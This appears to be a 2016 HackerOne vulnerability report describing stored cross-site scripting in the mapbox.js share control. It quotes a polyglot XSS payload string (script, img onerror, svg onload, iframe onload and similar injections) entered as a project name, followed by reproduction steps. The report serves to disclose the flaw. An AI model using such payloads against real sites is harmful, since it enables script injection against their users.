Mapbox: XSS in L.mapbox.shareControl in mapbox.js

ID H1:99245
Type hackerone
Reporter enderun07
Modified 2016-05-03T22:37:49


Hi Mapbox

I've found a xss vulnerability on mapbox sharing system.

I've a project called with "'><img src=a onerror=confirm(2)>"><script>alert(1);</script><iframe onload=alert(97)>"><svg onload=alert(2);>"onmouseover="confirm(2);<input onfocus=prompt(1) autofocus>"--> </script><svg/onload=';alert(/XSSPOSED/);'>"

than click it and copy the share URL and go to URL

than click the the marked area than you will see the vulnerability